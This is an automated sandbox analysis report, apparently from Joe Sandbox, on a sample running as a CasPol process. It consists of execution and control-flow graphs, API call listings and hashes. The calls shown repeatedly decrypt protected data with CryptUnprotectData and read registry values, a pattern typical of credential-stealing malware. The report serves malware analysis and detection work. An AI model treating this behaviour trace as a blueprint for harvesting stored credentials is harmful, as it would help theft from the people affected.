                                                  execution_graph 49693 f12ac8 49695 f0143e 49693->49695 49694 f128bf TerminateThread 49694->49695 49695->49694 49696 f12a92 49695->49696 49697 1d2d0c50 49698 1d2d0c5d 49697->49698 49701 1d2dce36 49698->49701 49699 1d2d0c6f 49702 1d2dce58 49701->49702 49707 1d2dd5d9 49702->49707 49728 1d2dd4d0 49702->49728 49733 1d2dd4c0 49702->49733 49703 1d2dcecb 49703->49699 49708 1d2dd5de 49707->49708 49710 1d2dd4d9 49707->49710 49711 1d2dd62f 49708->49711 49755 1d2de549 49708->49755 49769 1d2de474 49708->49769 49785 1d2dd9f8 49708->49785 49790 1d2de361 49708->49790 49812 1d2de3e6 49708->49812 49828 1d2de5ed 49708->49828 49839 1d2de502 49708->49839 49853 1d2dda08 49708->49853 49858 1d2de634 49708->49858 49866 1d2de4bb 49708->49866 49882 1d2de5a6 49708->49882 49893 1d2de3a8 49708->49893 49912 1d2de42d 49708->49912 49928 1d2de340 49708->49928 49709 1d2dd5d2 49709->49703 49710->49709 49712 1d2dd5d9 8 API calls 49710->49712 49738 1d2dd5e8 49710->49738 49712->49710 49730 1d2dd4d9 49728->49730 49729 1d2dd5d2 49729->49703 49730->49729 49731 1d2dd5d9 8 API calls 49730->49731 49732 1d2dd5e8 8 API calls 49730->49732 49731->49730 49732->49730 49735 1d2dd4d0 49733->49735 49734 1d2dd5d2 49734->49703 49735->49734 49736 1d2dd5d9 8 API calls 49735->49736 49737 1d2dd5e8 8 API calls 49735->49737 49736->49735 49737->49735 49739 1d2dd607 49738->49739 49740 1d2dd62f 49739->49740 49741 1d2de42d 8 API calls 49739->49741 49742 1d2de3a8 8 API calls 49739->49742 49743 1d2de5a6 5 API calls 49739->49743 49744 1d2de4bb 8 API calls 49739->49744 49745 1d2de634 5 API calls 49739->49745 49746 1d2dda08 CryptUnprotectData 49739->49746 49747 1d2de502 7 API calls 49739->49747 49748 1d2de5ed 5 API calls 49739->49748 49749 1d2de3e6 8 API calls 49739->49749 49750 1d2de361 8 API calls 49739->49750 49751 1d2dd9f8 CryptUnprotectData 49739->49751 49752 1d2de474 8 API calls 49739->49752 49753 1d2de549 7 API calls 49739->49753 49754 1d2de340 8 API calls 49739->49754 49741->49740 49742->49740 49743->49740 49744->49740 49745->49740 49746->49740 49747->49740 49748->49740 49749->49740 49750->49740 49751->49740 49752->49740 49753->49740 49754->49740 49756 1d2de55b 49755->49756 49950 2040ef48 49756->49950 49955 2040efa8 49756->49955 49757 1d2de575 49959 eddab0 49757->49959 49972 eddaa0 49757->49972 49758 1d2de619 49767 eddaa0 5 API calls 49758->49767 49768 eddab0 5 API calls 49758->49768 49984 ede058 49758->49984 49992 eddfe9 49758->49992 50000 eddfc1 49758->50000 49759 1d2de660 49759->49711 49767->49759 49768->49759 49770 1d2de486 49769->49770 50020 2040cac0 49770->50020 49771 1d2de4e7 49783 2040ef48 LdrInitializeThunk 49771->49783 49784 2040efa8 LdrInitializeThunk 49771->49784 49772 1d2de575 49775 eddaa0 5 API calls 49772->49775 49776 eddab0 5 API calls 49772->49776 49773 1d2de619 49777 eddfe9 5 API calls 49773->49777 49778 ede058 5 API calls 49773->49778 49779 eddfc1 5 API calls 49773->49779 49780 eddaa0 5 API calls 49773->49780 49781 eddab0 5 API calls 49773->49781 49774 1d2de660 49774->49711 49775->49773 49776->49773 49777->49774 49778->49774 49779->49774 49780->49774 49781->49774 49783->49772 49784->49772 49787 1d2dda2d 49785->49787 49786 1d2de308 49787->49786 50207 edb100 49787->50207 50212 edb110 49787->50212 49791 1d2de373 49790->49791 50217 edc1e0 49791->50217 50224 edc180 49791->50224 49792 1d2de38d 49800 edc1e0 CryptUnprotectData 49792->49800 49801 edc180 CryptUnprotectData 49792->49801 49793 1d2de3cb 49802 2040cac0 CryptUnprotectData 49793->49802 49794 1d2de4e7 49803 2040ef48 LdrInitializeThunk 49794->49803 49804 2040efa8 LdrInitializeThunk 49794->49804 49795 1d2de575 49805 eddaa0 5 API calls 49795->49805 49806 eddab0 5 API calls 49795->49806 49796 1d2de619 49807 eddfe9 5 API calls 49796->49807 49808 ede058 5 API calls 49796->49808 49809 eddfc1 5 API calls 49796->49809 49810 eddaa0 5 API calls 49796->49810 49811 eddab0 5 API calls 49796->49811 49797 1d2de660 49797->49711 49800->49793 49801->49793 49802->49794 49803->49795 49804->49795 49805->49796 49806->49796 49807->49797 49808->49797 49809->49797 49810->49797 49811->49797 49813 1d2de3f8 49812->49813 49825 2040cac0 CryptUnprotectData 49813->49825 49814 1d2de4e7 49826 2040ef48 LdrInitializeThunk 49814->49826 49827 2040efa8 LdrInitializeThunk 49814->49827 49815 1d2de575 49818 eddaa0 5 API calls 49815->49818 49819 eddab0 5 API calls 49815->49819 49816 1d2de619 49820 eddfe9 5 API calls 49816->49820 49821 ede058 5 API calls 49816->49821 49822 eddfc1 5 API calls 49816->49822 49823 eddaa0 5 API calls 49816->49823 49824 eddab0 5 API calls 49816->49824 49817 1d2de660 49817->49711 49818->49816 49819->49816 49820->49817 49821->49817 49822->49817 49823->49817 49824->49817 49825->49814 49826->49815 49827->49815 49829 1d2de5ff 49828->49829 49832 eddaa0 5 API calls 49829->49832 49833 eddab0 5 API calls 49829->49833 49830 1d2de619 49834 eddfe9 5 API calls 49830->49834 49835 ede058 5 API calls 49830->49835 49836 eddfc1 5 API calls 49830->49836 49837 eddaa0 5 API calls 49830->49837 49838 eddab0 5 API calls 49830->49838 49831 1d2de660 49831->49711 49832->49830 49833->49830 49834->49831 49835->49831 49836->49831 49837->49831 49838->49831 49840 1d2de514 49839->49840 49844 2040ef48 LdrInitializeThunk 49840->49844 49845 2040efa8 LdrInitializeThunk 49840->49845 49841 1d2de575 49846 eddaa0 5 API calls 49841->49846 49847 eddab0 5 API calls 49841->49847 49842 1d2de619 49848 eddfe9 5 API calls 49842->49848 49849 ede058 5 API calls 49842->49849 49850 eddfc1 5 API calls 49842->49850 49851 eddaa0 5 API calls 49842->49851 49852 eddab0 5 API calls 49842->49852 49843 1d2de660 49843->49711 49844->49841 49845->49841 49846->49842 49847->49842 49848->49843 49849->49843 49850->49843 49851->49843 49852->49843 49855 1d2dda2d 49853->49855 49854 1d2de308 49855->49854 49856 edb100 CryptUnprotectData 49855->49856 49857 edb110 CryptUnprotectData 49855->49857 49856->49855 49857->49855 49859 1d2de646 49858->49859 49861 eddfe9 5 API calls 49859->49861 49862 ede058 5 API calls 49859->49862 49863 eddfc1 5 API calls 49859->49863 49864 eddaa0 5 API calls 49859->49864 49865 eddab0 5 API calls 49859->49865 49860 1d2de660 49860->49711 49861->49860 49862->49860 49863->49860 49864->49860 49865->49860 49867 1d2de4cd 49866->49867 49881 2040cac0 CryptUnprotectData 49867->49881 49868 1d2de4e7 49872 2040ef48 LdrInitializeThunk 49868->49872 49873 2040efa8 LdrInitializeThunk 49868->49873 49869 1d2de575 49874 eddaa0 5 API calls 49869->49874 49875 eddab0 5 API calls 49869->49875 49870 1d2de619 49876 eddfe9 5 API calls 49870->49876 49877 ede058 5 API calls 49870->49877 49878 eddfc1 5 API calls 49870->49878 49879 eddaa0 5 API calls 49870->49879 49880 eddab0 5 API calls 49870->49880 49871 1d2de660 49871->49711 49872->49869 49873->49869 49874->49870 49875->49870 49876->49871 49877->49871 49878->49871 49879->49871 49880->49871 49881->49868 49883 1d2de5b8 49882->49883 49886 eddaa0 5 API calls 49883->49886 49887 eddab0 5 API calls 49883->49887 49884 1d2de619 49888 eddfe9 5 API calls 49884->49888 49889 ede058 5 API calls 49884->49889 49890 eddfc1 5 API calls 49884->49890 49891 eddaa0 5 API calls 49884->49891 49892 eddab0 5 API calls 49884->49892 49885 1d2de660 49885->49711 49886->49884 49887->49884 49888->49885 49889->49885 49890->49885 49891->49885 49892->49885 49894 1d2de3ba 49893->49894 49909 edc1e0 CryptUnprotectData 49894->49909 49910 edc180 CryptUnprotectData 49894->49910 49895 1d2de3cb 49911 2040cac0 CryptUnprotectData 49895->49911 49896 1d2de4e7 49900 2040ef48 LdrInitializeThunk 49896->49900 49901 2040efa8 LdrInitializeThunk 49896->49901 49897 1d2de575 49902 eddaa0 5 API calls 49897->49902 49903 eddab0 5 API calls 49897->49903 49898 1d2de619 49904 eddfe9 5 API calls 49898->49904 49905 ede058 5 API calls 49898->49905 49906 eddfc1 5 API calls 49898->49906 49907 eddaa0 5 API calls 49898->49907 49908 eddab0 5 API calls 49898->49908 49899 1d2de660 49899->49711 49900->49897 49901->49897 49902->49898 49903->49898 49904->49899 49905->49899 49906->49899 49907->49899 49908->49899 49909->49895 49910->49895 49911->49896 49913 1d2de43f 49912->49913 49918 2040cac0 CryptUnprotectData 49913->49918 49914 1d2de4e7 49919 2040ef48 LdrInitializeThunk 49914->49919 49920 2040efa8 LdrInitializeThunk 49914->49920 49915 1d2de575 49921 eddaa0 5 API calls 49915->49921 49922 eddab0 5 API calls 49915->49922 49916 1d2de619 49923 eddfe9 5 API calls 49916->49923 49924 ede058 5 API calls 49916->49924 49925 eddfc1 5 API calls 49916->49925 49926 eddaa0 5 API calls 49916->49926 49927 eddab0 5 API calls 49916->49927 49917 1d2de660 49917->49711 49918->49914 49919->49915 49920->49915 49921->49916 49922->49916 49923->49917 49924->49917 49925->49917 49926->49917 49927->49917 49929 1d2de346 49928->49929 49943 edc1e0 CryptUnprotectData 49929->49943 49944 edc180 CryptUnprotectData 49929->49944 49930 1d2de38d 49945 edc1e0 CryptUnprotectData 49930->49945 49946 edc180 CryptUnprotectData 49930->49946 49931 1d2de3cb 49947 2040cac0 CryptUnprotectData 49931->49947 49932 1d2de4e7 49948 2040ef48 LdrInitializeThunk 49932->49948 49949 2040efa8 LdrInitializeThunk 49932->49949 49933 1d2de575 49936 eddaa0 5 API calls 49933->49936 49937 eddab0 5 API calls 49933->49937 49934 1d2de619 49938 eddfe9 5 API calls 49934->49938 49939 ede058 5 API calls 49934->49939 49940 eddfc1 5 API calls 49934->49940 49941 eddaa0 5 API calls 49934->49941 49942 eddab0 5 API calls 49934->49942 49935 1d2de660 49935->49711 49936->49934 49937->49934 49938->49935 49939->49935 49940->49935 49941->49935 49942->49935 49943->49930 49944->49930 49945->49931 49946->49931 49947->49932 49948->49933 49949->49933 49951 2040ef69 49950->49951 49952 2040ef8c 49950->49952 49951->49757 49953 2040effd LdrInitializeThunk 49952->49953 49954 2040f01a 49953->49954 49954->49757 49956 2040efc7 49955->49956 49957 2040effd LdrInitializeThunk 49956->49957 49958 2040f01a 49957->49958 49958->49757 49960 eddac1 49959->49960 49961 eddae4 49959->49961 49960->49758 49962 eddd44 49961->49962 49965 eddb11 49961->49965 49966 eddfef 49961->49966 49963 eddab0 5 API calls 49962->49963 49963->49965 49964 ede019 49964->49758 49965->49758 49966->49964 49967 ede9cd RegQueryValueExW 49966->49967 49968 ede9d0 RegQueryValueExW 49966->49968 49969 edea20 RegQueryValueExW 49966->49969 50012 ede75c 49966->50012 50016 ede768 49966->50016 49967->49966 49968->49966 49969->49966 49973 eddab1 49972->49973 49974 eddd44 49973->49974 49977 eddac1 49973->49977 49978 eddfef 49973->49978 49975 eddab0 5 API calls 49974->49975 49975->49977 49976 ede019 49976->49758 49977->49758 49978->49976 49979 ede75c RegOpenKeyExW 49978->49979 49980 ede768 RegOpenKeyExW 49978->49980 49981 ede9cd RegQueryValueExW 49978->49981 49982 ede9d0 RegQueryValueExW 49978->49982 49983 edea20 RegQueryValueExW 49978->49983 49979->49978 49980->49978 49981->49978 49982->49978 49983->49978 49986 ede077 49984->49986 49985 ede2e0 49985->49759 49986->49985 49987 ede75c RegOpenKeyExW 49986->49987 49988 ede768 RegOpenKeyExW 49986->49988 49989 edea20 RegQueryValueExW 49986->49989 49990 ede9cd RegQueryValueExW 49986->49990 49991 ede9d0 RegQueryValueExW 49986->49991 49987->49986 49988->49986 49989->49986 49990->49986 49991->49986 49994 eddfea 49992->49994 49993 ede019 49993->49759 49994->49993 49995 ede9cd RegQueryValueExW 49994->49995 49996 ede9d0 RegQueryValueExW 49994->49996 49997 edea20 RegQueryValueExW 49994->49997 49998 ede75c RegOpenKeyExW 49994->49998 49999 ede768 RegOpenKeyExW 49994->49999 49995->49994 49996->49994 49997->49994 49998->49994 49999->49994 50001 eddd35 50000->50001 50006 eddfea 50000->50006 50002 eddd44 50001->50002 50005 eddd4d 50001->50005 50001->50006 50003 eddab0 5 API calls 50002->50003 50003->50005 50004 ede019 50004->49759 50005->49759 50006->50004 50007 ede9cd RegQueryValueExW 50006->50007 50008 ede9d0 RegQueryValueExW 50006->50008 50009 edea20 RegQueryValueExW 50006->50009 50010 ede75c RegOpenKeyExW 50006->50010 50011 ede768 RegOpenKeyExW 50006->50011 50007->50006 50008->50006 50009->50006 50010->50006 50011->50006 50013 ede7ba RegOpenKeyExW 50012->50013 50015 ede82e 50013->50015 50017 ede7ba RegOpenKeyExW 50016->50017 50019 ede82e 50017->50019 50019->50019 50021 2040cae0 50020->50021 50027 edb5c8 50021->50027 50042 edb890 50021->50042 50053 edb676 50021->50053 50064 edb5d8 50021->50064 50022 2040cb0a 50022->49771 50029 edb5f8 50027->50029 50030 edb5c8 CryptUnprotectData 50027->50030 50031 edb5d8 CryptUnprotectData 50027->50031 50032 edb676 CryptUnprotectData 50027->50032 50033 edb890 CryptUnprotectData 50027->50033 50028 edb8ca 50028->50022 50029->50028 50079 edd422 50029->50079 50099 edd520 50029->50099 50109 edd480 50029->50109 50120 edd1e0 50029->50120 50140 edd4d0 50029->50140 50151 edd295 50029->50151 50171 edd528 50029->50171 50181 20409283 50029->50181 50030->50029 50031->50029 50032->50029 50033->50029 50044 edb631 50042->50044 50043 edb8ca 50043->50022 50044->50043 50045 20409283 CryptUnprotectData 50044->50045 50046 edd528 CryptUnprotectData 50044->50046 50047 edd295 CryptUnprotectData 50044->50047 50048 edd1e0 CryptUnprotectData 50044->50048 50049 edd4d0 CryptUnprotectData 50044->50049 50050 edd480 CryptUnprotectData 50044->50050 50051 edd520 CryptUnprotectData 50044->50051 50052 edd422 CryptUnprotectData 50044->50052 50045->50044 50046->50044 50047->50044 50048->50044 50049->50044 50050->50044 50051->50044 50052->50044 50055 edb631 50053->50055 50054 edb8ca 50054->50022 50055->50054 50056 edd528 CryptUnprotectData 50055->50056 50057 edd295 CryptUnprotectData 50055->50057 50058 edd1e0 CryptUnprotectData 50055->50058 50059 edd4d0 CryptUnprotectData 50055->50059 50060 edd480 CryptUnprotectData 50055->50060 50061 edd520 CryptUnprotectData 50055->50061 50062 edd422 CryptUnprotectData 50055->50062 50063 20409283 CryptUnprotectData 50055->50063 50056->50055 50057->50055 50058->50055 50059->50055 50060->50055 50061->50055 50062->50055 50063->50055 50066 edb5f8 50064->50066 50067 edb5c8 CryptUnprotectData 50064->50067 50068 edb5d8 CryptUnprotectData 50064->50068 50069 edb676 CryptUnprotectData 50064->50069 50070 edb890 CryptUnprotectData 50064->50070 50065 edb8ca 50065->50022 50066->50065 50071 edd528 CryptUnprotectData 50066->50071 50072 edd295 CryptUnprotectData 50066->50072 50073 edd1e0 CryptUnprotectData 50066->50073 50074 edd4d0 CryptUnprotectData 50066->50074 50075 edd480 CryptUnprotectData 50066->50075 50076 edd520 CryptUnprotectData 50066->50076 50077 edd422 CryptUnprotectData 50066->50077 50078 20409283 CryptUnprotectData 50066->50078 50067->50066 50068->50066 50069->50066 50070->50066 50071->50066 50072->50066 50073->50066 50074->50066 50075->50066 50076->50066 50077->50066 50078->50066 50081 edd252 50079->50081 50080 edd45c 50080->50029 50081->50080 50082 edd467 50081->50082 50084 edd528 CryptUnprotectData 50081->50084 50085 edd295 CryptUnprotectData 50081->50085 50086 edd1e0 CryptUnprotectData 50081->50086 50087 edd4d0 CryptUnprotectData 50081->50087 50088 edd480 CryptUnprotectData 50081->50088 50089 edd520 CryptUnprotectData 50081->50089 50090 edd422 CryptUnprotectData 50081->50090 50098 20409283 CryptUnprotectData 50081->50098 50083 edd499 50082->50083 50091 edd528 CryptUnprotectData 50082->50091 50092 edd295 CryptUnprotectData 50082->50092 50093 edd1e0 CryptUnprotectData 50082->50093 50094 edd4d0 CryptUnprotectData 50082->50094 50095 edd480 CryptUnprotectData 50082->50095 50096 edd520 CryptUnprotectData 50082->50096 50097 edd422 CryptUnprotectData 50082->50097 50083->50029 50084->50081 50085->50081 50086->50081 50087->50081 50088->50081 50089->50081 50090->50081 50091->50083 50092->50083 50093->50083 50094->50083 50095->50083 50096->50083 50097->50083 50098->50081 50100 edd544 50099->50100 50101 edd5f1 50100->50101 50102 edd528 CryptUnprotectData 50100->50102 50103 edd295 CryptUnprotectData 50100->50103 50104 edd1e0 CryptUnprotectData 50100->50104 50105 edd4d0 CryptUnprotectData 50100->50105 50106 edd480 CryptUnprotectData 50100->50106 50107 edd520 CryptUnprotectData 50100->50107 50108 edd422 CryptUnprotectData 50100->50108 50101->50029 50102->50101 50103->50101 50104->50101 50105->50101 50106->50101 50107->50101 50108->50101 50110 edd499 50109->50110 50111 edd4bc 50109->50111 50110->50029 50112 edd4e9 50111->50112 50113 edd528 CryptUnprotectData 50111->50113 50114 edd295 CryptUnprotectData 50111->50114 50115 edd1e0 CryptUnprotectData 50111->50115 50116 edd4d0 CryptUnprotectData 50111->50116 50117 edd480 CryptUnprotectData 50111->50117 50118 edd520 CryptUnprotectData 50111->50118 50119 edd422 CryptUnprotectData 50111->50119 50112->50029 50113->50112 50114->50112 50115->50112 50116->50112 50117->50112 50118->50112 50119->50112 50123 edd201 50120->50123 50121 edd45c 50121->50029 50122 edd499 50122->50029 50123->50121 50124 edd467 50123->50124 50132 20409283 CryptUnprotectData 50123->50132 50133 edd528 CryptUnprotectData 50123->50133 50134 edd295 CryptUnprotectData 50123->50134 50135 edd1e0 CryptUnprotectData 50123->50135 50136 edd4d0 CryptUnprotectData 50123->50136 50137 edd480 CryptUnprotectData 50123->50137 50138 edd520 CryptUnprotectData 50123->50138 50139 edd422 CryptUnprotectData 50123->50139 50124->50122 50125 edd528 CryptUnprotectData 50124->50125 50126 edd295 CryptUnprotectData 50124->50126 50127 edd1e0 CryptUnprotectData 50124->50127 50128 edd4d0 CryptUnprotectData 50124->50128 50129 edd480 CryptUnprotectData 50124->50129 50130 edd520 CryptUnprotectData 50124->50130 50131 edd422 CryptUnprotectData 50124->50131 50125->50122 50126->50122 50127->50122 50128->50122 50129->50122 50130->50122 50131->50122 50132->50123 50133->50123 50134->50123 50135->50123 50136->50123 50137->50123 50138->50123 50139->50123 50141 edd4e9 50140->50141 50142 edd50c 50140->50142 50141->50029 50143 edd5f1 50142->50143 50144 edd528 CryptUnprotectData 50142->50144 50145 edd295 CryptUnprotectData 50142->50145 50146 edd1e0 CryptUnprotectData 50142->50146 50147 edd4d0 CryptUnprotectData 50142->50147 50148 edd480 CryptUnprotectData 50142->50148 50149 edd520 CryptUnprotectData 50142->50149 50150 edd422 CryptUnprotectData 50142->50150 50143->50029 50144->50143 50145->50143 50146->50143 50147->50143 50148->50143 50149->50143 50150->50143 50153 edd252 50151->50153 50152 edd45c 50152->50029 50153->50152 50154 edd467 50153->50154 50163 20409283 CryptUnprotectData 50153->50163 50164 edd528 CryptUnprotectData 50153->50164 50165 edd295 CryptUnprotectData 50153->50165 50166 edd1e0 CryptUnprotectData 50153->50166 50167 edd4d0 CryptUnprotectData 50153->50167 50168 edd480 CryptUnprotectData 50153->50168 50169 edd520 CryptUnprotectData 50153->50169 50170 edd422 CryptUnprotectData 50153->50170 50155 edd499 50154->50155 50156 edd528 CryptUnprotectData 50154->50156 50157 edd295 CryptUnprotectData 50154->50157 50158 edd1e0 CryptUnprotectData 50154->50158 50159 edd4d0 CryptUnprotectData 50154->50159 50160 edd480 CryptUnprotectData 50154->50160 50161 edd520 CryptUnprotectData 50154->50161 50162 edd422 CryptUnprotectData 50154->50162 50155->50029 50156->50155 50157->50155 50158->50155 50159->50155 50160->50155 50161->50155 50162->50155 50163->50153 50164->50153 50165->50153 50166->50153 50167->50153 50168->50153 50169->50153 50170->50153 50172 edd544 50171->50172 50173 edd5f1 50172->50173 50174 edd528 CryptUnprotectData 50172->50174 50175 edd295 CryptUnprotectData 50172->50175 50176 edd1e0 CryptUnprotectData 50172->50176 50177 edd4d0 CryptUnprotectData 50172->50177 50178 edd480 CryptUnprotectData 50172->50178 50179 edd520 CryptUnprotectData 50172->50179 50180 edd422 CryptUnprotectData 50172->50180 50173->50029 50174->50173 50175->50173 50176->50173 50177->50173 50178->50173 50179->50173 50180->50173 50182 20409297 50181->50182 50186 204098c8 50182->50186 50191 204098d8 50182->50191 50183 204092a3 50183->50029 50187 204098d8 50186->50187 50188 204099b1 50187->50188 50196 20409b27 50187->50196 50200 20409b28 50187->50200 50188->50183 50192 204098fd 50191->50192 50193 204099b1 50191->50193 50192->50193 50194 20409b27 CryptUnprotectData 50192->50194 50195 20409b28 CryptUnprotectData 50192->50195 50193->50183 50194->50193 50195->50193 50197 20409b28 50196->50197 50204 20409678 50197->50204 50201 20409b45 50200->50201 50202 20409678 CryptUnprotectData 50201->50202 50203 20409b7d 50202->50203 50203->50188 50205 20409d68 CryptUnprotectData 50204->50205 50206 20409b7d 50205->50206 50206->50188 50208 edb110 50207->50208 50210 edb5c8 CryptUnprotectData 50208->50210 50211 edb5d8 CryptUnprotectData 50208->50211 50209 edb13b 50209->49787 50210->50209 50211->50209 50213 edb130 50212->50213 50215 edb5c8 CryptUnprotectData 50213->50215 50216 edb5d8 CryptUnprotectData 50213->50216 50214 edb13b 50214->49787 50215->50214 50216->50214 50219 edc201 50217->50219 50218 edc251 50218->49792 50219->50218 50221 edd295 CryptUnprotectData 50219->50221 50222 edd1e0 CryptUnprotectData 50219->50222 50223 edd422 CryptUnprotectData 50219->50223 50220 edc689 50220->49792 50221->50220 50222->50220 50223->50220 50225 edc1a1 50224->50225 50227 edc1c4 50224->50227 50225->49792 50226 edc251 50226->49792 50227->50226 50229 edd295 CryptUnprotectData 50227->50229 50230 edd1e0 CryptUnprotectData 50227->50230 50231 edd422 CryptUnprotectData 50227->50231 50228 edc689 50228->49792 50229->50228 50230->50228 50231->50228 49687 203e6250 49688 203e6261 49687->49688 49690 203e6284 49687->49690 49689 203e62b1 49690->49689 49691 203e6327 LdrInitializeThunk 49690->49691 49692 203e6343 49691->49692

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2627 203e6250-203e625f 2628 203e6284-203e62af 2627->2628 2629 203e6261-203e626b 2627->2629 2633 203e62d4-203e633c LdrInitializeThunk 2628->2633 2634 203e62b1-203e62bb 2628->2634 2630 203e626d-203e627e 2629->2630 2631 203e6280-203e6283 2629->2631 2630->2631 2643 203e6343-203e634f 2633->2643 2636 203e62bd-203e62ce 2634->2636 2637 203e62d0-203e62d3 2634->2637 2636->2637 2644 203e6355-203e635e 2643->2644 2645 203e6551-203e6564 2643->2645 2646 203e6586 2644->2646 2647 203e6364-203e6379 2644->2647 2648 203e658b-203e658f 2645->2648 2646->2648 2653 203e637b-203e638e 2647->2653 2654 203e6393-203e63ae 2647->2654 2649 203e659a 2648->2649 2650 203e6591 2648->2650 2652 203e659b 2649->2652 2650->2649 2652->2652 2655 203e6525-203e6529 2653->2655 2661 203e63bc 2654->2661 2662 203e63b0-203e63ba 2654->2662 2656 203e652b 2655->2656 2657 203e6534 2655->2657 2656->2657 2657->2645 2663 203e63c1-203e63c3 2661->2663 2662->2663 2664 203e63dd-203e6476 2663->2664 2665 203e63c5-203e63d8 2663->2665 2683 203e6478-203e6482 2664->2683 2684 203e6484 2664->2684 2665->2655 2685 203e6489-203e648b 2683->2685 2684->2685 2686 203e64cf-203e6523 2685->2686 2687 203e648d-203e648f 2685->2687 2686->2655 2688 203e649d 2687->2688 2689 203e6491-203e649b 2687->2689 2691 203e64a2-203e64a4 2688->2691 2689->2691 2691->2686 2692 203e64a6-203e64cd 2691->2692 2692->2686
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5736931607.00000000203E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_203e0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: h8
                                                  • API String ID: 2994545307-2507464633
                                                  • Opcode ID: 9e79ebd5f8806a68d86d60eb92bc769a9c54aa463fb3b1c39508f3c0cebde17e
                                                  • Instruction ID: 41f57549c7337c42fa3097aaf71ba2961aa4190f4a788193a0eab22dc5c27161
                                                  • Opcode Fuzzy Hash: 9e79ebd5f8806a68d86d60eb92bc769a9c54aa463fb3b1c39508f3c0cebde17e
                                                  • Instruction Fuzzy Hash: A6919D34A043299FCB04DBB5C498AAE7BF6AF85344F118539E115EB2A6DB38DC05CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 20409DCD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5737123972.0000000020400000.00000040.00000800.00020000.00000000.sdmp, Offset: 20400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_20400000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: CryptDataUnprotect
                                                  • String ID:
                                                  • API String ID: 834300711-0
                                                  • Opcode ID: 7371ea219a534c8911b7ca0ecc6e72995cda735bfb5d070fa05d10b3696f11de
                                                  • Instruction ID: cbce9653cadfbe8c0daccb4a1e80b063f0605d50c28ff6dd4caa82b73b7d228c
                                                  • Opcode Fuzzy Hash: 7371ea219a534c8911b7ca0ecc6e72995cda735bfb5d070fa05d10b3696f11de
                                                  • Instruction Fuzzy Hash: 1721377280024A9FDB10CF99D845BDEFFF5EF48360F14841AE518A7251C739AA54CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 20409DCD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5737123972.0000000020400000.00000040.00000800.00020000.00000000.sdmp, Offset: 20400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_20400000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: CryptDataUnprotect
                                                  • String ID:
                                                  • API String ID: 834300711-0
                                                  • Opcode ID: 47576b2d363620bec665833f8d527cff5988cb7c74b8f2f198fd9219732670e5
                                                  • Instruction ID: 10d85f6c11d8a8b7c17d4bf98cac81c9f65c1a839361bdf987a4eea70f879f18
                                                  • Opcode Fuzzy Hash: 47576b2d363620bec665833f8d527cff5988cb7c74b8f2f198fd9219732670e5
                                                  • Instruction Fuzzy Hash: 7C1167768002499FCB10CF99D844BDEBBF5EF48320F148429E618A7210C739A951DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fa8562e06748d00e1860d5f4b2520fafc11abace17d7a4a7b364f99319ee70a
                                                  • Instruction ID: ec97c56a4b2987acaf9d4defbef0deca08bb795409a4cdd80e3241ca684e0778
                                                  • Opcode Fuzzy Hash: 1fa8562e06748d00e1860d5f4b2520fafc11abace17d7a4a7b364f99319ee70a
                                                  • Instruction Fuzzy Hash: 7FB18070E4470ACFDB40CFA5D885BEEBBF2BF58314F248529D425A7254EB749845CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78d6271cf8399945b326f033c05f869d52aaeb2930e9892ac71b9f090ba0f6a3
                                                  • Instruction ID: eb2db8da31b100ffb97ff7d944728cb7b5915d8cdf38d664f82c4519b5150320
                                                  • Opcode Fuzzy Hash: 78d6271cf8399945b326f033c05f869d52aaeb2930e9892ac71b9f090ba0f6a3
                                                  • Instruction Fuzzy Hash: CDE017B544A2D4DFC302AB34EAC9A443F7CFA2332232905AAD085CA062CB270820CB31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1604 2040ef48-2040ef67 1605 2040ef69-2040ef73 1604->1605 1606 2040ef8c-2040ef98 1604->1606 1607 2040ef75-2040ef86 1605->1607 1608 2040ef88-2040ef8b 1605->1608 1611 2040ef9a-2040ef9c 1606->1611 1612 2040ef9d-2040f014 call 2040f27d LdrInitializeThunk 1606->1612 1607->1608 1611->1612 1620 2040f01a-2040f034 1612->1620 1621 2040f15d-2040f17a call 2040b288 call 2040b418 1612->1621 1620->1621 1625 2040f03a-2040f054 1620->1625 1635 2040f17f-2040f188 1621->1635 1629 2040f056-2040f058 1625->1629 1630 2040f05a 1625->1630 1631 2040f05d-2040f0b8 call 2040b71c 1629->1631 1630->1631 1642 2040f0ba-2040f0bc 1631->1642 1643 2040f0be 1631->1643 1644 2040f0c1-2040f15b call 2040b71c 1642->1644 1643->1644 1644->1635
                                                  APIs
                                                  Strings
